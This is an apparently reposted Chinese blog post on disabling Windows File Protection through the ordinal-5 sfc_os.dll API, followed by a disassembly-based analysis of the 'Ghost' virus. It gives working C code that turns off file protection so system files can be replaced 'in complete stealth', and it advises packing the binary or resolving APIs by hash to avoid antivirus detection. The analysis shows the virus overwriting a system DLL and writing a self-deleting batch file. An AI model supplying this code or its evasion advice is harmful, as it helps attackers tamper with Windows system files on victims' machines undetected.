利用 sfc_os.dll #5号 api 关闭系统文件保护 篡改系统文件

利用 sfc_os.dll #5号 api 关闭系统文件保护 篡改系统文件Windows文件保护对于恶意程序来说是个烦人的东西。尤其是当你想修改系统文件时它就起到保护作用了。这个sfc_os.dll#5号api也是我在病毒分析时遇到的。它的作用是关闭系统文件保护60秒。下面给出一个C的源码样例。利用这个时为了避免被查杀最好给程序加壳或者用hash来查找api。//c

大家好,欢迎来到IT知识分享网。利用 sfc_os.dll #5号 api 关闭系统文件保护 篡改系统文件

Windows文件保护对于恶意程序来说是个烦人的东西。尤其是当你想修改系统文件时它就起到保护作用了。这个sfc_os.dll #5号 api也是我在病毒分析时遇到的。它的作用是关闭系统文件保护60秒。

下面给出一个C的源码样例。利用这个时为了避免被查杀最好给程序加壳或者用hash来查找api。

//c code demo
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);

void Disable_WFP()

{
HINSTANCE hmod=LoadLibrary(“sfc_os.dll”);
CPP SetSfcFileException;

// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);

SetSfcFileException(0, L”c://windows//system32//calc.exe”,-1);

//Now we can modify the system file in a complete stealth.

}

我再来说说我分析的这个病毒吧。是在看雪里面看到的Ghost病毒有人分析过但是觉得还是有的补充的。http://bbs.pediy.com/showthread.php?t=99266

看到上面的那个关闭系统保护的api可能有人就知道了。这个病毒最核心的思路就是替换系统dll。对于要替换哪个系统dll病毒的作者也做了些工作。首先是查找系统都运行了下面这些预定的服务没。

UPX0:00402228 aAppmgmt        db ‘AppMgmt’,0          ; DATA XREF: UPX0:0040306Co
UPX0:00402230 aSchedule       db ‘Schedule’,0         ; DATA XREF: UPX0:00403068o
UPX0:00402239                 align 4
UPX0:0040223C aRemoteregistry db ‘RemoteRegistry’,0   ; DATA XREF: UPX0:00403064o
UPX0:0040224B                 align 4
UPX0:0040224C aHelpsvc        db ‘helpsvc’,0          ; DATA XREF: UPX0:00403060o
UPX0:00402254 aCryptsvc       db ‘CryptSvc’,0         ; DATA XREF: UPX0:0040305Co
UPX0:0040225D                 align 10h
UPX0:00402260 aThemes         db ‘Themes’,0           ; DATA XREF: UPX0:00403058o
UPX0:00402267                 align 4
UPX0:00402268 aBrowser        db ‘Browser’,0          ; DATA XREF: UPX0:00403054o
UPX0:00402270 aTapisrv        db ‘Tapisrv’,0          ; DATA XREF: UPX0:00403050o
UPX0:00402278 aNla            db ‘Nla’,0              ; DATA XREF: UPX0:0040304Co
UPX0:0040227C aNetman         db ‘Netman’,0           ; DATA XREF: UPX0:00403048o
UPX0:00402283                 align 4
UPX0:00402284 aSsdpsrv        db ‘SSDPSRV’,0          ; DATA XREF: UPX0:00403044o
UPX0:0040228C aUpnphost       db ‘upnphost’,0         ; DATA XREF: UPX0:00403040o
UPX0:00402295                 align 4
UPX0:00402298 aNtmssvc        db ‘Ntmssvc’,0          ; DATA XREF: UPX0:0040303Co
UPX0:004022A0 aEventsystem    db ‘EventSystem’,0      ; DATA XREF: UPX0:00403038o
UPX0:004022AC aXmlprov        db ‘xmlprov’,0          ; DATA XREF: UPX0:00403034o
UPX0:004022B4 aWmdmpmsn       db ‘WmdmPmSN’,0         ; DATA XREF: UPX0:00403030o
UPX0:004022BD                 align 10h
UPX0:004022C0 aFastuserswitch db ‘FastUserSwitchingCompatibility’,0
UPX0:004022C0                                         ; DATA XREF: UPX0:0040302Co
UPX0:004022DF                 align 10h
UPX0:004022E0 aBits           db ‘BITS’,0  

如果有再查找与上面服务对应的dll。之后就是关毕文件保护释放资源重写dll。

最后是清理工作新建一个临时文件(批处理类型)

批处理文件 将病毒程序复制替换系统文件然后删除病毒程序

UPX0:0040178F ; int __stdcall sub_40178F(struct _OVERLAPPED Overlapped)
UPX0:0040178F sub_40178F      proc near               ; CODE XREF: WinMain(x,x,x,x)+1E6p
UPX0:0040178F                                         ; WinMain(x,x,x,x)+31Cp …
UPX0:0040178F
UPX0:0040178F Filename        = byte ptr -728h
UPX0:0040178F Buffer          = byte ptr -620h
UPX0:0040178F var_220         = byte ptr -220h
UPX0:0040178F hObject         = dword ptr -114h
UPX0:0040178F Dst             = byte ptr -110h
UPX0:0040178F Overlapped      = _OVERLAPPED ptr -4
UPX0:0040178F
UPX0:0040178F                 push    ebp
UPX0:00401790                 mov     ebp, esp
UPX0:00401792                 sub     esp, 728h
UPX0:00401798                 or      [ebp+hObject], 0FFFFFFFFh
UPX0:0040179F                 push    104h            ; Size
UPX0:004017A4                 push    0               ; Val
UPX0:004017A6                 lea     eax, [ebp+Dst]
UPX0:004017AC                 push    eax             ; Dst
UPX0:004017AD                 call    memset
UPX0:004017B2                 add     esp, 0Ch
UPX0:004017B5                 lea     eax, [ebp+Dst]
UPX0:004017BB                 push    eax             ; lpBuffer
UPX0:004017BC                 push    104h            ; nBufferLength
UPX0:004017C1                 call    GetTempPathA
UPX0:004017C7                 push    offset aTempdel_bat ; “TempDel.bat”
UPX0:004017CC                 lea     eax, [ebp+Dst]  ; dst:%temp_path%.tempdel.bat
UPX0:004017D2                 push    eax
UPX0:004017D3                 call    lstrcat
UPX0:004017D9                 push    104h            ; Size
UPX0:004017DE                 push    0               ; Val
UPX0:004017E0                 lea     eax, [ebp+Filename]
UPX0:004017E6                 push    eax             ; Dst
UPX0:004017E7                 call    memset
UPX0:004017EC                 add     esp, 0Ch
UPX0:004017EF                 push    104h            ; nSize
UPX0:004017F4                 lea     eax, [ebp+Filename]
UPX0:004017FA                 push    eax             ; lpFilename
UPX0:004017FB                 push    0               ; hModule
UPX0:004017FD                 call    GetModuleFileNameA
UPX0:00401803                 push    104h            ; Size
UPX0:00401808                 push    0               ; Val
UPX0:0040180A                 lea     eax, [ebp+var_220]
UPX0:00401810                 push    eax             ; Dst
UPX0:00401811                 call    memset
UPX0:00401816                 add     esp, 0Ch
UPX0:00401819                 cmp     dword ptr [ebp+Overlapped.anonymous_0+4], 1
UPX0:0040181D                 jnz     short loc_401839
UPX0:0040181F                 push    offset dll_path
UPX0:00401824                 push    offset aSDllcacheLsasv ; “%s\\dllcache\\lsasvc.dll”
UPX0:00401829                 lea     eax, [ebp+var_220]
UPX0:0040182F                 push    eax             ; LPSTR
UPX0:00401830                 call    wsprintfA
UPX0:00401836                 add     esp, 0Ch
UPX0:00401839
UPX0:00401839 loc_401839:                             ; CODE XREF: sub_40178F+8Ej
UPX0:00401839                 push    400h            ; Size
UPX0:0040183E                 push    0               ; Val
UPX0:00401840                 lea     eax, [ebp+Buffer]
UPX0:00401846                 push    eax             ; Dst
UPX0:00401847                 call    memset
UPX0:0040184C                 add     esp, 0Ch
UPX0:0040184F                 lea     eax, [ebp+Dst]
UPX0:00401855                 push    eax
UPX0:00401856                 lea     eax, [ebp+Filename]
UPX0:0040185C                 push    eax
UPX0:0040185D                 lea     eax, [ebp+Filename]
UPX0:00401863                 push    eax
UPX0:00401864                 lea     eax, [ebp+var_220]
UPX0:0040186A                 push    eax
UPX0:0040186B                 lea     eax, [ebp+Filename]
UPX0:00401871                 push    eax
UPX0:00401872                 push    offset aCopyYSSRunagai ; “copy /Y \”%s\” \”%s\”\r\n:runagain\r\ndel \”%s\”\r”…
UPX0:00401877                 lea     eax, [ebp+Buffer]
UPX0:0040187D                 push    eax             ; LPSTR
UPX0:0040187E                 call    wsprintfA       ;  copy /Y “C:\ghos y样本\Ghost.exe”
UPX0:0040187E                                         ; “C:\WINDOWS\system32\dllcache\lsasvc.dll”..
UPX0:0040187E                                         ; :runagain..del “C:\ghosy样本\Ghost.exe”..
UPX0:0040187E                                         ; if exist “C\ghosy样本\Ghost.exe” goto runa  gain.
UPX0:0040187E                                         ; .del “C:\DO CUME~1\mike\LOCA LS~1\Temp\TempDe
UPX0:0040187E                                         ;
UPX0:00401884                 add     esp, 1Ch
UPX0:00401887                 push    0               ; hTemplateFile
UPX0:00401889                 push    80h             ; dwFlagsAndAttributes
UPX0:0040188E                 push    2               ; dwCreationDisposition
UPX0:00401890                 push    0               ; lpSecurityAttributes
UPX0:00401892                 push    0               ; dwShareMode
UPX0:00401894                 push    0C0000000h      ; dwDesiredAccess
UPX0:00401899                 lea     eax, [ebp+Dst]
UPX0:0040189F                 push    eax             ; lpFileName
UPX0:004018A0                 call    CreateFileA     ; 创建临时文件
UPX0:004018A0                                         ; 0012EBF0   0012F224  |FileName = “C:\DOCUME~1\mike\LOCALS~1\Temp\TempDel.bat”
UPX0:004018A0                                         ; 0012EBF4   C0000000  |Access = GENERIC_READ|GENERIC_WRITE
UPX0:004018A0                                         ; 0012EBF8   00000000  |ShareMode = 0
UPX0:004018A0                                         ; 0012EBFC   00000000  |pSecurity = NULL
UPX0:004018A0                                         ; 0012EC00   00000002  |Mode = CREATE_ALWAYS
UPX0:004018A0                                         ; 0012EC04   00000080  |Attributes = NORMAL
UPX0:004018A0                                         ; 0012EC08   00000000  \hTemplateFile = NULL
UPX0:004018A0                                         ;
UPX0:004018A0                                         ;
UPX0:004018A6                 mov     [ebp+hObject], eax
UPX0:004018AC                 cmp     [ebp+hObject], 0FFFFFFFFh
UPX0:004018B3                 jnz     short loc_4018B7
UPX0:004018B5                 jmp     short locret_40190C
UPX0:004018B7 ; —————————————————————————
UPX0:004018B7
UPX0:004018B7 loc_4018B7:                             ; CODE XREF: sub_40178F+124j
UPX0:004018B7                 push    0
UPX0:004018B9                 lea     eax, [ebp+Overlapped]
UPX0:004018BC                 push    eax             ; lpOverlapped
UPX0:004018BD                 lea     eax, [ebp+Buffer]
UPX0:004018C3                 push    eax             ; lpNumberOfBytesWritten
UPX0:004018C4                 call    lstrlen
UPX0:004018CA                 push    eax             ; nNumberOfBytesToWrite
UPX0:004018CB                 lea     eax, [ebp+Buffer]
UPX0:004018D1                 push    eax             ; lpBuffer
UPX0:004018D2                 push    [ebp+hObject]   ; hFile
UPX0:004018D8                 call    WriteFile
UPX0:004018DE                 push    [ebp+hObject]   ; hObject
UPX0:004018E4                 call    CloseHandle     ; 创建的是一个批处理的临时文件,内容在上面
UPX0:004018EA                 push    0
UPX0:004018EC                 push    0
UPX0:004018EE                 push    0
UPX0:004018F0                 lea     eax, [ebp+Dst]
UPX0:004018F6                 push    eax
UPX0:004018F7                 push    offset aOpen    ; “open”
UPX0:004018FC                 push    0
UPX0:004018FE                 call    p_shellexecute
UPX0:00401904                 push    0               ; uExitCode
UPX0:00401906                 call    ExitProcess
UPX0:0040190C ; —————————————————————————
UPX0:0040190C
UPX0:0040190C locret_40190C:                          ; CODE XREF: sub_40178F+126j

最后还忘记了这个病毒是upx壳。脱壳也不费什么劲菜鸟我就不赘述了。

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/32644.html

(0)

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信